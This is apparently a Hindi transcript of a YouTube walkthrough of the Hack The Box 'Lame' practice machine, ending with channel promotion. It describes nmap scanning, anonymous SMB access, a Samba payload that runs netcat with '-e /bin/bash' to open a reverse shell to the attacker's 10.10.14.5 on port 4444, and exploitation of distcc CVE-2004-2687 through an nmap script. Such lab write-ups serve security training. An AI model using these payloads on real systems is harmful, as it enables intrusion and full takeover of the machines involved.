हे एवरीवन, कैसे हैं आप लोग। तो आज हम हैक द बॉक्स की लेम मशीन को देखेंगे, पर इसमें एक ट्विस्ट है। हम कोई मेटास्प्लॉइट जैसा ऑटोमेटेड टूल यूज नहीं करने वाले। नहीं, आज सब कुछ स्क्रैच से मैन्युअली करेंगे। क्यों? क्योंकि असली स्किल टूल्स चलाने में नहीं, बल्कि ये समझने में है कि हैकिंग असल में काम कैसे करती है। तो अगर आप बिल्कुल शुरुआत कर रहे हैं तो ये आपके लिए है। चलिए शुरू करते हैं। और ये बात मैं दिल से मानता हूं। देखिए, कोई भी टूल चलाना सीख सकता है, पर उसके पीछे का लॉजिक, वो आर्ट, वही आपको एक असली हैकर बनाती है। और मुझे पूरा विश्वास है कि आप सब में वो पोटेंशियल है। ये सिर्फ एक वॉक थ्रू नहीं है, ये आपके फ्यूचर की एक मजबूत नींव है। ओके, तो किसी भी हैक का सबसे पहला और सबसे जरूरी स्टेप जानकारी इकट्ठा करना, यानी रिकॉनेसेंस। इसको ऐसे सोचिए कि हम किसी किले पर हमला करने से पहले उसकी सारी कमजोर दीवारों, गुप्त दरवाजों और खिड़कियों का पता लगा रहे हैं। जितनी अच्छी जानकारी, उतना आसान हमारा। तो हमारा पहला हथियार है nmap, सबसे भरोसेमंद साथी। कमांड देखिए, nmap-sv-a-p-1010-10-3। अब इसका मतलब क्या है? SV से हम पता लगा रहे हैं कि कौन सी सर्विस का कौन सा वर्जन चल रहा है। A है एग्रेसिव स्कैन, जो ऑपरेटिंग सिस्टम से लेकर सब कुछ जानने की कोशिश करेगा। और -P का मतलब है भाई कोई भी दरवाजा छोड़ना मत, सारे 65,535 पोर्ट्स चेक करो। और ये रहे रिजल्ट्स। देखिए कितने सारे खुले दरवाजे मिले हैं। FTP है, SSH है, लेकिन हमारी नजरें दो सर्विसेज पर टिक गई हैं। एक है सांबा, जो पोर्ट 139 और 445 पर चल रहा है, और दूसरा है डिस्क CC, पोर्ट 3632 पर। इनके पुराने वर्जन्स को देखकर ही लग रहा है कि यहां कुछ मजेदार मिल सकता है। तो चलिए सांबा से शुरू करते हैं। तो हमारा पहला टारगेट है सांबा। अब सांबा फाइल शेयरिंग के लिए यूज होता है, लेकिन अगर इसकी कॉन्फ़िगरेशन ठीक से ना की गई हो तो ये एक अटैकर के लिए खुला हाईवे बन जाता है। देखते हैं क्या ये हाईवे हमारे लिए खुला है। अब हमें ये पता लगाना है कि इस पर कौन कौन से फोल्डर्स शेयर्ड हैं। इसके लिए हम यूज करेंगे SMB क्लाइंट कमांड का। -L का मतलब है लिस्ट, और यहां हम एक हैकर की तरह सोचेंगे। nmap ने बताया था कि FTP पर अनोनिमस लॉगिन था, तो क्या पता यहां भी पासवर्ड ना मांगे। चलो बिना पासवर्ड के ट्राई करते हैं। बहुत बढ़िया, अनोनिमस लॉगिन काम कर गया। हमें TMP नाम का एक शेयर मिला है, लेकिन क्या हम इसमें कुछ लिख सकते हैं? सिर्फ देखने से तो काम नहीं चलेगा। इसको कंफर्म करने के लिए SMB मैप यूज करते हैं, और बिंगो, हमें रीड और राइट दोनों परमिशंस हैं। दोस्तों, हमें अंदर जाने का रास्ता मिल गया है। ओके, अब आता है सबसे जरूरी हिस्सा, हमारा पेलोड। ये देखने में थोड़ा डरावना लग सकता है, पर बहुत सिंपल है। लॉग ऑन कमांड के अंदर हम टारगेट मशीन को एक कमांड दे रहे हैं। हम कह रहे हैं, हे नेटकैट यानी NC का इस्तेमाल करके मेरे कंप्यूटर यानी 10.10.14.5 पर पोर्ट 4444 पर एक कनेक्शन बनाओ। और जब कनेक्शन बन जाए तो -e bin bash के जरिए मुझे अपना कमांड शेल दे दो। ये हमारा डिजिटल हथियार है। तो सारी तैयारी हो चुकी है। हमने कमजोरी ढूंढ ली, अंदर जाने का रास्ता बना लिया, और हमारा हथियार भी तैयार है। अब असली मजा शुरू होगा। चलिए इस मशीन पर पूरा कंट्रोल हासिल करते हैं। हमारा प्लान बिल्कुल सीधा है। पहला, हम अपने कंप्यूटर पर NC-LVNP-4444 कमांड चलाकर एक जाल बिछाएंगे, ताकि हम आने वाले कनेक्शन को पकड़ सकें। फिर SMB क्लाइंट से कनेक्ट होकर अपना पेलोड चलाएंगे, और बस इंतजार करेंगे शिकार के जाल में फंसने का। और ये देखिए, कनेक्शन आ गया। जैसे ही हमने वहां पेलोड एग्जीक्यूट किया, हमारे लिसनर पर एक कनेक्शन आ गया। इसका मतलब है हमारा प्लान 100% सफल हुआ, और अब हम टारगेट मशीन के अंदर हैं। हम अंदर तो आ गए हैं, पर हमारी अथॉरिटी क्या है? हम इस सिस्टम में हैं कौन? ये जानने के लिए हम एक सिंपल कमांड चलाएंगे, ID। ये हमारी पहचान बताएगा। और ये रहा जवाब, UID = 0 रूट। बूम! इसका मतलब है कि हम कोई नॉर्मल यूजर नहीं, हम इस सिस्टम के एडमिन हैं, रूट हैं। मशीन पर हमारा पूरा कंट्रोल है। मिशन कामयाब। लेकिन रुकिए, एक अच्छा हैकर हमेशा एक से ज्यादा रास्ते खोजता है। याद है nmap स्कैन में हमें पोर्ट 3632 पर वो डिस्क CC सर्विस मिली थी। चलिए अब उस दरवाजे को भी खटखटा कर देखते हैं। डिस्क CC के इस पुराने वर्जन में एक बहुत ही फेमस कमजोरी है, CVE 2004-2687। ये इतनी खतरनाक है कि एक अटैकर को सीधे सर्वर पर अपनी मर्जी के कमांड्स चलाने की इजाजत दे देती है।
मतलब ये एक बना बनाया रास्ता है। और मजे की बात यह है कि Nmap सिर्फ जानकारी इकट्ठा करने के लिए नहीं है। इसकी स्क्रिप्टिंग इंजन का इस्तेमाल करके हम सीधे हमला भी कर सकते हैं। देखिए, इस एक कमांड से हम Nmap को कह रहे हैं कि वो इस कमजोरी का फायदा उठाकर टारगेट पर id कमांड चलाए। और रिजल्ट हमारे सामने है, UID = 1 डेमन। इस रास्ते से भी हमें एक्सेस मिल गया, लेकिन इस बार हम एक कम पावर वाले डेमन यूजर हैं। यहां से रूट तक पहुंचने के लिए जो करना पड़ता है उसे कहते हैं प्रिविलेज एस्केलेशन, और ये अपने आप में एक अलग स्किल है। तो हमने लेम मशीन को 2 अलग-अलग तरीकों से हैक किया। ये दिखाता है कि एक टारगेट तक पहुंचने के कई रास्ते हो सकते हैं, लेकिन ये सिर्फ एक मशीन की कहानी का अंत नहीं है। ये आपकी अपनी हैकिंग यात्रा की असली शुरुआत है। तो आज हमने क्या सीखा? पहला, हमेशा गहराई से जानकारी इकट्ठा करो। दूसरा, अटैक करने के एक से ज्यादा रास्ते होते हैं। और सबसे जरूरी बात, ऑटोमेटेड टूल्स आपको हैकर नहीं बनाते। कमजोरियों को खुद समझकर उन्हें मैन्युअली एक्सप्लॉइट करने से ही असली स्किल बनती है। ये तो बस एक शुरुआत थी। अगर आप ऐसे ही और मुश्किल चैलेंज मेरे साथ सॉल्व करना चाहते हैं और इन कॉन्सेप्ट्स को और भी गहराई से सीखना चाहते हैं, तो मेरे YouTube चैनल AI डिजिटल गुरु और वेबसाइट adigitalguru.in पर जरूर आएं। वहां हम बहुत कुछ सीखते हैं। आपका सपोर्ट मुझे और भी बेहतर कंटेंट बनाने की हिम्मत देता है। जब आप सब्सक्राइब करते हैं तो ये सिर्फ एक नंबर नहीं बढ़ता, बल्कि ये मुझे यकीन दिलाता है कि मैं सही रास्ते पर हूं और आप जैसे हजारों लोगों की मदद कर पा रहा हूं। याद रखिए, आपका एक सब्सक्राइब मेरे लिए एक मौका है और आप जैसे हजारों सीखने वालों के लिए एक बड़ा सरप्राइज लाने का जरिया है। AI डिजिटल गुरु सिर्फ एक चैनल नहीं, ये एक मिशन है। नॉलेज को हर उस इंसान तक पहुंचाना जो सीखना चाहता है। सीखते रहिए और आगे बढ़ते रहिए।